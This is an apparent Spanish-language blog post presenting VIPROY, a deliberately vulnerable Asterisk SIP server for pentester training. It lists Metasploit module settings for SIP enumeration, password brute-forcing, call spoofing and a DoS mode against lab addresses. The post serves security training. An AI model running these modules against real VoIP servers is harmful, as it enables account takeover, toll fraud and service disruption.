¿Qué es VIPROY?
Es un servidor SIP (Session Initiation Protocol) basado en Asterisk, configurado y preparado para el entrenamiento de los Pentester, es decir, un servidor vulnerable preparado para trabajar y soportar comunicaciones por VoIP. Esta pensado para conseguir averiguar el password (cracking) y obtener acceso a los buzones de voz.
SIP es el protocolo de señalización que hace posible el establecimiento de las llamadas de voz por Internet, es decir por IP.
Este Kit se ha desarrollado para mejorar las habilidades de los Pentester en los entornos de VoIP, en especial las pruebas de seguridad que se realizan para los procesos de autenticación.
VIPROY permite poner a prueba el sistema de autenticación, proporcionando de este modo un entrenamiento muy interesante para aquellos profesionales (Pentester) que se enfrenten a un test de penetración con infraestructura de VoIP.
Las pruebas o test que se incluyen en el Kit, son:
Options tester: manipulación de las opciones de comunicación en la VoIP, con el protoclo SIP se puede indicar el codec que se utiliza en la comunicación, asà como el puerto de conexión. Se puede poner a prueba las opciones.
Brute force: Ataques de fuerza bruta en el proceso de identificación de cada teléfono/ usuario.
Enumerator: Se puede poner en practica la técnica de conseguir información sobre los usaurios y/o terminales de VoIP, que tiene el servidor registrados.
Invite tester: pruebas en el proceso de llamada de los usuarios de VoIP.
Trust analyzer, Proxy/Registration tester: evaluar la seguridad del proceso de registro y la comunicación a través de proxy.
Como se puede apreciar, VIPROY ofrece un entorno ideal para el entrenamiento de los Pentester orientados a las infraestructuras con VoIP.
PREPARANDO EL ESCENARIO
El KIT consiste en un máquina virtual preparada y lista para su funcionamiento; se puede descargar en siguiente enlace:
MD5 Hash of VulnVoIP.7z: 1411bc06403307d5ca2ecae47181972a
VMware: vulnvoip.7z
Las caracterÃsticas principales son: x86, VMWare. 512MB RAM, NAT network.
Por supuesto, para usar correctamente el entorno, se debe de conocer como estan configurados los diferentes módulos del Servidor Asterisk.
A continuación, copio la información que la página oficial proporciona:
Global Settings
setg CHOST 192.168.1.99 #Local Hostsetg CPORT 5099 #Local Port
setg RHOSTS 192.168.1.1-254 #Target Network
setg RHOST 192.168.1.201 #Target Host
Basic Usage of OPTIONS Module
use auxiliary/scanner/sip/vsipoptionsshow options
set THREADS 255
run
Basic Usage of REGISTER Module
use auxiliary/scanner/sip/vsipregistershow options
run
set LOGIN true
set USERNAME 101
set PASSWORD s3cur3
run
Basic Usage of INVITE Module
use auxiliary/scanner/sip/vsipinviteset FROM 2000
set TO 1000
run
set LOGIN true
set FROM 102
set USERNAME 102
set PASSWORD letmein123
run
set DOS_MODE true
set NUMERIC_USERS true
set NUMERIC_MIN 200
set NUMERIC_MAX 205
run
Basic Usage of ENUMERATOR Module
use auxiliary/scanner/sip/vsipenumeratorshow options
unset USERNAME
set USER_FILE /tmp/files/users2
set VERBOSE false
set METHOD SUBSCRIBE
run
unset USER_FILE
set METHOD SUBSCRIBE
set NUMERIC_USERS true
set NUMERIC_MAX 2300
run
set METHOD REGISTER
run
Basic Usage of BRUTE FORCE Module
use auxiliary/scanner/sip/vsipbruteforceshow options
set RHOST 192.168.1.201
set USERNAME 2000
set PASS_FILE /tmp/files/passwords
set VERBOSE false
run
unset USERNAME
set USER_FILE /tmp/files/users2
run
unset USER_FILE
set NUMERIC_USERS true
set NUMERIC_MAX 500
run
Basic Usage of Trust Analyzer Module
use auxiliary/scanner/sip/vsiptrustshow options
set SRC_RHOSTS 192.168.1.200-210
set SRC_RPORTS 5060
set SIP_SERVER 192.168.1.201
set INTERFACE eth0
set TO 101
run
show options
set ACTION CALL
set SRC_RHOSTS 192.168.1.202
set FROM James Bond
run
Basic Usage of SIP Proxy Module
use auxiliary/scanner/sip/vsipproxyshow options
set PRXCLT_PORT 5060
set PRXCLT_IP 192.168.1.99
set PRXSRV_PORT 5089
set PRXSRV_IP 192.168.1.99
set CLIENT_IP 192.168.1.120
set CLIENT_PORT 5060
set SERVER_IP 192.168.1.201
set SERVER_PORT 5060
set CONF_FILE /tmp/sipproxy_replace.txt
set LOG true
set VERBOSE false
run
EJEMPLO DE USO: DEMO
A continuación os dejo un vÃdeo de demostración con #Metasploit SIP Module, donde se puede ver algunos ataques realizados dentro de este entorno vulnerable, por poner un ejemplo: SIP Service Discovery, ejecutando un REGISTER sin credenciales.
Para más información:
VÃa: Toolswatch.org
0 comentarios:
Publicar un comentario